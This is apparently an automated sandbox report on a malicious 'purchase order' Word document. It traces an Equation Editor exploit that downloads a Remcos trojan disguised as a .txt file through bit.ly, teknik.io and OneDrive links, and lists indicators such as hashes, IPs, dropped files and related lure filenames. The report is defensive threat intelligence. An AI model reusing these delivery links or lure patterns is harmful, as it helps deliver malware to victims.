            C:\Users\Public\69577.exe12%ReversingLabsWin32.Trojan.Remcos

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://DynDns.comDynDNS0%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
            http://JSQBKI.com0%Avira URL Cloudsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
            https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
            https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bit.ly
            67.199.248.11
            truefalse
              high
              teknik.io
              5.79.72.163
              truefalse
                high
                onedrive.live.com
                unknown
                unknownfalse
                  high
                  cbzrfq.bl.files.1drv.com
                  unknown
                  unknownfalse
                    high
                    u.teknik.io
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://bit.ly/3qO7045false
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSRegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmpfalse
                          high
                          http://crl.entrust.net/server1.crl0RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                            high
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://JSQBKI.comRegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://ocsp.entrust.net03RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            https://onedrive.live.com/download?cid=F57CEB019EB26E7D&resid=F57CEB019EB26E7D%21108&authkey=AN1oxHGRegAsm.exe, RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmp, RegAsm.exe, 00000005.00000002.2351491082.00000000005D8000.00000004.00000020.sdmpfalse
                              high
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://api.ipify.org%GETMozilla/5.0RegAsm.exe, 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              http://www.%s.comPARegAsm.exe, 00000005.00000002.2351812250.0000000002750000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              http://www.diginotar.nl/cps/pkioverheid0RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://cbzrfq.bl.files.1drv.com/RegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmpfalse
                                high
                                https://cbzrfq.bl.files.1drv.com/DRegAsm.exe, 00000005.00000002.2351532072.0000000000663000.00000004.00000020.sdmpfalse
                                  high
                                  http://ocsp.entrust.net0DRegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://secure.comodo.com/CPS0RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                                    high
                                    http://crl.entrust.net/2048ca.crl0RegAsm.exe, 00000005.00000002.2351501536.00000000005EB000.00000004.00000020.sdmpfalse
                                      high
                                      https://onedrive.live.com/RegAsm.exe, 00000005.00000002.2351474503.00000000005BD000.00000004.00000020.sdmpfalse
                                        high
                                        https://u.teknik.io/PWua8.txt3qO7045[1].htm.2.drfalse
                                          high

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          67.199.248.11
                                          unknownUnited States
                                          396982GOOGLE-PRIVATE-CLOUDUSfalse
                                          5.79.72.163
                                          unknownNetherlands
                                          60781LEASEWEB-NL-AMS-01NetherlandsNLfalse

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:357325
                                          Start date:24.02.2021
                                          Start time:13:05:58
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 6m 47s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:purchase order_2242021.doc
                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winDOC@8/19@4/2
                                          EGA Information:Failed
                                          HDC Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 79%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .doc
                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                          • Attach to Office via COM
                                          • Scroll down
                                          • Close Viewer
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                          • TCP Packets have been reduced to 100
                                          • Excluded IPs from analysis (whitelisted): 192.35.177.64, 23.0.174.185, 23.0.174.187, 67.26.17.254, 8.238.85.126, 8.248.137.254, 8.250.159.254, 8.241.90.126, 13.107.42.13, 13.107.42.12
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, odc-web-brs.onedrive.akadns.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, l-0004.l-msedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, odc-bl-files-brs.onedrive.akadns.net, auto.au.download.windowsupdate.com.c.footprint.net, odc-bl-files-geo.onedrive.akadns.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          13:06:38API Interceptor47x Sleep call for process: EQNEDT32.EXE modified
                                          13:07:56API Interceptor78x Sleep call for process: 69577.exe modified
                                          13:08:01API Interceptor629x Sleep call for process: RegAsm.exe modified
                                          13:08:11API Interceptor296x Sleep call for process: dw20.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          67.199.248.11DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                          • bit.ly/3kijui1
                                          QUOTE.docGet hashmaliciousBrowse
                                          • bit.ly/2P3CMwd
                                          IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                          • bit.ly/2ZElo32
                                          SWIFT Payment W0301.docGet hashmaliciousBrowse
                                          • bit.ly/3dyLFYN
                                          Quotation408S_A02021_AHYAN_group_of_companies.docGet hashmaliciousBrowse
                                          • bit.ly/2OMPBuy
                                          YOUR PRODUCT.docGet hashmaliciousBrowse
                                          • bit.ly/2LVhrUo
                                          Invoice.docGet hashmaliciousBrowse
                                          • bit.ly/3amsMGn
                                          Purchase order.docGet hashmaliciousBrowse
                                          • bit.ly/3qm8NNO
                                          IMG_04779.docGet hashmaliciousBrowse
                                          • bit.ly/3dffBt0
                                          INV00004423.docGet hashmaliciousBrowse
                                          • bit.ly/3aLXmrV
                                          PO_Scanned_06387.docGet hashmaliciousBrowse
                                          • bit.ly/3rwUfef
                                          IMG_Scanned_3062.docGet hashmaliciousBrowse
                                          • bit.ly/2YXPr5o
                                          INV00004423.docGet hashmaliciousBrowse
                                          • bit.ly/2MvEzt1
                                          DTBT760087673.docGet hashmaliciousBrowse
                                          • bit.ly/3arM6Rr
                                          IMG_59733.docGet hashmaliciousBrowse
                                          • bit.ly/3rf1U0L
                                          IMG_804941.docGet hashmaliciousBrowse
                                          • bit.ly/3cyMT5V
                                          IMG_0916.docGet hashmaliciousBrowse
                                          • bit.ly/3pFy7y3
                                          SOA 2.docGet hashmaliciousBrowse
                                          • bit.ly/3cxhzEz
                                          Quotation Ref FP-299318.docGet hashmaliciousBrowse
                                          • bit.ly/3anMC2V
                                          PO 9174-AR.docGet hashmaliciousBrowse
                                          • bit.ly/2LcGNNi
                                          5.79.72.163DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                            DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                              PO AAN2102002-V020.docGet hashmaliciousBrowse
                                                PO55004.docGet hashmaliciousBrowse
                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                    RFQ Document.docGet hashmaliciousBrowse
                                                      DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                                        DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                          QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                                            Quotation408S_A02021_AHYAN_group_of_companies.docGet hashmaliciousBrowse
                                                              tcwO1bua5E.exeGet hashmaliciousBrowse
                                                                87e8ff5c51e0.xlsGet hashmaliciousBrowse
                                                                  Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtfGet hashmaliciousBrowse
                                                                    hvEUyC1xKe.exeGet hashmaliciousBrowse
                                                                      NEW_QUOTATION_mp20201126_Quotation_20P6200829_sup_mpjxPriceInquiry_1606406420424.docGet hashmaliciousBrowse
                                                                        Purchase Order.docGet hashmaliciousBrowse
                                                                          CAz0v9shg2.rtfGet hashmaliciousBrowse
                                                                            pGSheevuq8.rtfGet hashmaliciousBrowse
                                                                              wtYnMaD8Bg.rtfGet hashmaliciousBrowse
                                                                                Wines list12.12.2020.docGet hashmaliciousBrowse

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  bit.lyDHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  PO AAN2102002-V020.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  PO55004.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  RFQ Document.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  Order.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  QUOTE.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  IMG_57109_Scanned.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  Deadly Variants of Covid 19.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  swift payment.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  SWIFT Payment W0301.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  _a6590.docxGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  Statement-ID28865611496334.vbsGet hashmaliciousBrowse
                                                                                  • 67.199.248.10

                                                                                  ASN

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  LEASEWEB-NL-AMS-01NetherlandsNLDHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  PO AAN2102002-V020.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  PO55004.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  RFQ Document.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  SecuriteInfo.com.Trojan.PackedNET.540.1271.exeGet hashmaliciousBrowse
                                                                                  • 213.227.154.188
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  MV9tCJw8Xr.exeGet hashmaliciousBrowse
                                                                                  • 5.79.70.250
                                                                                  QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  Quotation408S_A02021_AHYAN_group_of_companies.docGet hashmaliciousBrowse
                                                                                  • 5.79.72.163
                                                                                  Request For Quotation.PDF.exeGet hashmaliciousBrowse
                                                                                  • 212.32.237.101
                                                                                  PO#652.exeGet hashmaliciousBrowse
                                                                                  • 5.79.87.207
                                                                                  Parcel _009887 .exeGet hashmaliciousBrowse
                                                                                  • 212.32.237.92
                                                                                  PO 20211602.xlsmGet hashmaliciousBrowse
                                                                                  • 82.192.82.225
                                                                                  6d0000.exeGet hashmaliciousBrowse
                                                                                  • 213.227.133.129
                                                                                  SecuriteInfo.com.Trojan.PackedNET.541.9005.exeGet hashmaliciousBrowse
                                                                                  • 62.212.86.139
                                                                                  New Order 83329 PDF.exeGet hashmaliciousBrowse
                                                                                  • 95.211.208.58
                                                                                  YTDSetup.exeGet hashmaliciousBrowse
                                                                                  • 82.192.80.226
                                                                                  GOOGLE-PRIVATE-CLOUDUSDHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  Offerte aanvragen 22-02-2021.pptGet hashmaliciousBrowse
                                                                                  • 67.199.248.16
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  PO AAN2102002-V020.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  PO55004.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  RFQ Document.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  Order.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  QUOTE.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  IMG_57109_Scanned.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  Deadly Variants of Covid 19.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  swift payment.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  IMG_61061_SCANNED.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  IMG_6078_SCANNED.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  IMG_01670_Scanned.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.10
                                                                                  SWIFT Payment W0301.docGet hashmaliciousBrowse
                                                                                  • 67.199.248.11
                                                                                  _a6590.docxGet hashmaliciousBrowse
                                                                                  • 67.199.248.11

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                                  Category:dropped
                                                                                  Size (bytes):59134
                                                                                  Entropy (8bit):7.995450161616763
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):893
                                                                                  Entropy (8bit):7.366016576663508
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                  MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                  SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                  SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                  SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):328
                                                                                  Entropy (8bit):3.090852246460565
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:kKLRgVpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:jRr3kPlE99SNxAhUeo+aKt
                                                                                  MD5:06D163042F0078DA3522C50E90975E28
                                                                                  SHA1:2173031E7AC39CA991EA0C7D992E1F4BEA3DE2A8
                                                                                  SHA-256:E6E0D52FF25A5EAC6B21282081AA15C511FB0666EEF3B0D91F90F0E114ECB98A
                                                                                  SHA-512:DE2171EBF28792ADE6A7BE0646575C31FBD2577283AC83737DC4BF7AA1577C797DD789AD45B6F5D584F3D7BAE958FB3A86065D5081C55D674D7E3F4A47E0F41D
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: p...... ..........4.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):252
                                                                                  Entropy (8bit):3.0215269645321685
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:kkFklMdUtXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKX8JliBAIdQZV7eAYLit
                                                                                  MD5:418E33A6103113CCFF36E4BE556E8261
                                                                                  SHA1:D33A2F7A96B8FAA2121BDDEC0D2F3DF3961B1419
                                                                                  SHA-256:2C2AFE1975A6CA6A7BD38F5954DD86E72B5D1289212A8BB3328317BDB1977E6E
                                                                                  SHA-512:143B2A4378B9572E4DB1532F732DA5146EBAD0814875DA732A7AB1D0FBB17F3F45A6F5E8D2482427BDFE00C2A98DA90968F63394F58D16A8C890782E1AF64B37
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview: p...... ....`...........(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt
                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:downloaded
                                                                                  Size (bytes):131072
                                                                                  Entropy (8bit):4.79650156443488
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:HWWTwV4fVhuy/kysvxhG7NuX40vbyovaWm5vj2kht/uxVQwV4MjW:7wVUPsyChtX40Tyova75vj2mt/QqwV
                                                                                  MD5:5D2D34449323C67BA1F5EC7561DF2204
                                                                                  SHA1:A48C7F51DB44CA8A2B0240D9C57C1983AC5D75DD
                                                                                  SHA-256:95A1FF3F5D08AC3D0DFE64300EEC668FA0C78BDB7DA395F1D91735C5A0AEF8A5
                                                                                  SHA-512:28B4C6DF609084045F866686E559C7771B6455BC8FDE56942F9422265C6ED2ACFE12EF383C23225AD171D9D7BA22EFC9EF7137C069070812AF798EDAA8AE6D73
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                                                  Reputation:low
                                                                                  IE Cache URL:https://u.teknik.io/PWua8.txt
